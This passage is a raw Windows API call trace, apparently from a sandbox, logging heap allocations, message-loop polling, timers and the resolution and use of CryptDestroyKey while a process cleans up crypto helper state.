[0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0174.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0174.238] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0174.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0174.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0174.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0174.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0174.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0174.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50968, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0174.240] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0174.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0174.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0174.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0174.241] CryptDestroyKey (hKey=0xa87090) returned 1 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0174.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0174.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0174.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0174.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0174.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0174.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0174.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0174.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0174.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0174.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0174.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0174.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0174.243] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 1 [0174.243] TranslateMessage (lpMsg=0x8cf3a0) returned 0 [0174.243] DispatchMessageW (lpMsg=0x8cf3a0) returned 0x0 [0174.243] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0174.243] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0174.361] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0174.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0174.362] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0174.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0174.362] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0174.363] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0174.363] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0174.363] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0174.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0174.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0174.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0174.364] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0174.365] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0174.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0174.365] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0174.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0174.365] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0174.366] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0174.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0174.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.366] 